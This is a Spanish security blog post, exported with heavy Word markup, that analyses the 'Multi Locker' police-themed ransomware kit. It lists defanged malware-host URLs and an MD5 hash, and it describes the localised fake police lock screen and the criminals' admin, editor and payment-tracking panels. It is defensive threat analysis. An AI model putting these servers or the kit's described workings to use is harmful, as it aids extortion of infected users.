UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 1"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 1"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 1"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 1"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 1"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 1"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Revision"/>
<w:LsdException Locked="false" Priority="34" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="List Paragraph"/>
<w:LsdException Locked="false" Priority="29" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Quote"/>
<w:LsdException Locked="false" Priority="30" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Quote"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 1"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 1"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 1"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 1"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 1"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 1"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 1"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 1"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 2"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 2"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 2"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 2"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 2"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 2"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 2"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 2"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 2"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 2"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 2"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 2"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 2"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 2"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 3"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 3"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 3"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 3"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 3"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 3"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 3"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 3"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 3"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 3"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 3"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 3"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 3"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 3"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 4"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 4"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 4"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 4"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 4"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 4"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 4"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 4"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 4"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 4"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 4"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 4"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 4"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 4"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 5"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 5"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]--><!--[if !mso]><img src="//img2.blogblog.com/img/video_object.png" style="background-color: #b2b2b2; " class="BLOGGER-object-element tr_noresize tr_placeholder" id="ieooui" data-original-id="ieooui" />
<style>
st1\:*{behavior:url(#ieooui) }
</style>
<![endif]--><!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Tabla normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
mso-para-margin:0cm;
mso-para-margin-bottom:.0001pt;
mso-pagination:widow-orphan;
font-size:10.0pt;
font-family:"Times New Roman","serif";}
</style>
<![endif]-->
<br />
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">En
los últimos tiempos se ha detectado un incremento de las infecciones producidas
por el troyano Ramsomware , también llamado <span style="mso-spacerun: yes;"> </span>Ramsomlock o Multi Locker o más comúnmente por
el “Troyano de la policía” debido a que simula que el equipo ha sido
intervenido y bloqueado por la policía hasta que no se pague una cuota por penalización
legal que no es más que un fraude o estafa por parte de los criminales.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">En
esta ocasión se va a analizar el kit del Troyano MULTI LOCKER Versión ·</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">El
equipo del usuario es comprometido al visitar el vector de infección: <span style="mso-spacerun: yes;"> </span></span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"><span style="mso-spacerun: yes;"></span>hxxp://62.76.45.94/exe.php</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">Que
descarga el binario malicioso:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">hXXp://62.76.45.94/colt.exe</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">Tamaño:
7680 </span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">MD5:baa5de00714b02660bfc092b53c449f7
</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">La IP</span><span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> <span style="mso-spacerun: yes;"> </span>62.76.45.94 esta alojada en el ISP Clodo-Cloud
de Rusia</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> Una
vez que el equipo esta infectado el Malware modifica toda la configuración del
sistema y del registro para que cada vez que el usuario reinicie el equipo
automáticamente el troyano toma el control del mismo bloqueando todo el sistema,
<span style="mso-spacerun: yes;"> </span>además de presentar la pantalla falsa de
la policía solicitando que pague la multa por supuestamente haber visitado
contenidos ilegales de pornografía infantil o contra la propiedad intelectual</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">Esta
pantalla falsa se descarga desde la dirección del servidor fraudulento:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">hXXP://62.76.45.94/lending/tds.php</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">Que
lo que hace es chequear la versión del idioma del navegador del usuario para
mostrar la pantalla falsa en el idioma del usuario y con los correspondientes
avisos legales o de los cuerpos policiales de dicho país.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> El
código del script TDS.php es el siguiente:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-oR8gTtFTWdA/UOrecrjMjZI/AAAAAAAAAWk/Z_6aPn7i7ng/s1600/tds.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://1.bp.blogspot.com/-oR8gTtFTWdA/UOrecrjMjZI/AAAAAAAAAWk/Z_6aPn7i7ng/s640/tds.jpg" width="475" /></a></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> </span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">Para
el caso de los usuarios españoles mostraría la siguiente pantalla fraudulenta
alojada en la dirección:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">hXXP://62.76.45.94/lending/ES.php</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-FU8qIHKDxUo/UOre0F0JZcI/AAAAAAAAAWs/INFF3Jn-e4g/s1600/police.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="277" src="http://3.bp.blogspot.com/-FU8qIHKDxUo/UOre0F0JZcI/AAAAAAAAAWs/INFF3Jn-e4g/s400/police.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">En
este caso la pantalla esta bastante mal diseñada no como en otros kits
detectados bastantes mas detallados logrando engañar al usuario con la
veracidad de la misma.</span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> </span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">Los
criminales pueden modificar las paginas de advertencia para lograr la
apariencia de legalidad accediendo al mini editor que existe en el kit del
Ramsomware también llamado por algunas casas antivirus como Ransomlock.</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">El
panel se denomina MULTI LOCKER LENDING EDITOR y se accede mediante la URL:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">Hxxp://62.76.45.94/lending/</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-NXrO9kPRgQI/UOre-l4bB4I/AAAAAAAAAW0/sSHDs6gD0g0/s1600/login.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="http://1.bp.blogspot.com/-NXrO9kPRgQI/UOre-l4bB4I/AAAAAAAAAW0/sSHDs6gD0g0/s400/login.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> </span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">Y
la estructura de ficheros del KIT:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-tD3DDKIMkxU/UOrfJiMT13I/AAAAAAAAAW8/xdus2Kaxei0/s1600/mutilocker.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="http://2.bp.blogspot.com/-tD3DDKIMkxU/UOrfJiMT13I/AAAAAAAAAW8/xdus2Kaxei0/s640/mutilocker.jpg" width="488" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">Si
el usuario paga la cuota a través de los medios de pago por Internet UKASH,
MoneyPack, etc el equipo será liberado una vez introducido el código del recibo
que ofrecen estos medios de pago</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-VdYoO8njfGI/UOrfj7iYl3I/AAAAAAAAAXE/Rv07xw_tozU/s1600/unlock.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="71" src="http://3.bp.blogspot.com/-VdYoO8njfGI/UOrfj7iYl3I/AAAAAAAAAXE/Rv07xw_tozU/s400/unlock.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-KqrJ2L6gWCM/UOrfpMmlCXI/AAAAAAAAAXM/I3ZTAnhJX7I/s1600/unlock-2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="41" src="http://2.bp.blogspot.com/-KqrJ2L6gWCM/UOrfpMmlCXI/AAAAAAAAAXM/I3ZTAnhJX7I/s400/unlock-2.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">Al
panel estadístico del Ramsomware se accede mediante la página de acceso
principal:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-C9u5zIyA5Do/UOrfwC5QyTI/AAAAAAAAAXU/I6FqhwZyrro/s1600/login2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="208" src="http://2.bp.blogspot.com/-C9u5zIyA5Do/UOrfwC5QyTI/AAAAAAAAAXU/I6FqhwZyrro/s400/login2.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">Una
vez que se accede aparece la pantalla del menú principal del<span style="mso-spacerun: yes;"> </span>KIT MULTI LOCKER Version 3</span><br />
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> </span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-AXNh0DA-7g8/UOrf6dg7scI/AAAAAAAAAXc/vrOxnrSQQBI/s1600/2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="261" src="http://4.bp.blogspot.com/-AXNh0DA-7g8/UOrf6dg7scI/AAAAAAAAAXc/vrOxnrSQQBI/s400/2.jpg" width="400" /></a></div>
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> </span><br />
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">Con
su menú estadístico de usuarios infectados</span><br />
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> </span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-cnKoAQUqwWk/UOrgngINuQI/AAAAAAAAAXk/3BvZ-Wq9bJk/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="338" src="http://1.bp.blogspot.com/-cnKoAQUqwWk/UOrgngINuQI/AAAAAAAAAXk/3BvZ-Wq9bJk/s400/1.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
</div>
<div class="MsoNormal">
</div>
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">Y el menú de seguimiento de los usuarios que han pagado por desbloquear su equipo</span><br />
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> </span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-8EjJBbu8gEU/UOrhIbW0_9I/AAAAAAAAAXs/AsDlJLKzlyI/s1600/3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="160" src="http://4.bp.blogspot.com/-8EjJBbu8gEU/UOrhIbW0_9I/AAAAAAAAAXs/AsDlJLKzlyI/s400/3.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> </span><span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"> </span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">La
estructura de archivos del KIT es la siguiente:</span>
</div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-WB_Stwho5Kc/UOrhPogvVvI/AAAAAAAAAX0/65bZZoma-J4/s1600/kit.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="http://1.bp.blogspot.com/-WB_Stwho5Kc/UOrhPogvVvI/AAAAAAAAAX0/65bZZoma-J4/s400/kit.jpg" width="400" /></a></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;"></span></div>
<div class="MsoNormal">
<span lang="ES-TRAD" style="font-family: "Arial","sans-serif"; font-size: 11.0pt;">Su
panel de instalación:</span></div>
<div class="MsoNormal">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-M4i9HZu0WRE/UOrhX83sDII/AAAAAAAAAX8/Z-nk1Uj9C4U/s1600/4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="381" src="http://2.bp.blogspot.com/-M4i9HZu0WRE/UOrhX83sDII/AAAAAAAAAX8/Z-nk1Uj9C4U/s400/4.jpg" width="400" /></a></div>
<div class="MsoNormal">
<br /></div>
<div class="MsoNormal">
<br /></div>
Jose Dos Santoshttp://www.blogger.com/profile/06085925687781351552noreply@blogger.com0tag:blogger.com,1999:blog-5707299821054210891.post-84903424756615641042012-12-26T03:51:00.000-08:002012-12-26T03:51:26.275-08:00Phishing Criminal Infraestructure<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:HyphenationZone>21</w:HyphenationZone>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>ES</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:DontVertAlignCellWithSp/>
<w:DontBreakConstrainedForcedTables/>
<w:DontVertAlignInTxbx/>
<w:Word11KerningPairs/>
<w:CachedColBalance/>
<w:UseFELayout/>
</w:Compatibility>
<w:DoNotOptimizeForBrowser/>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
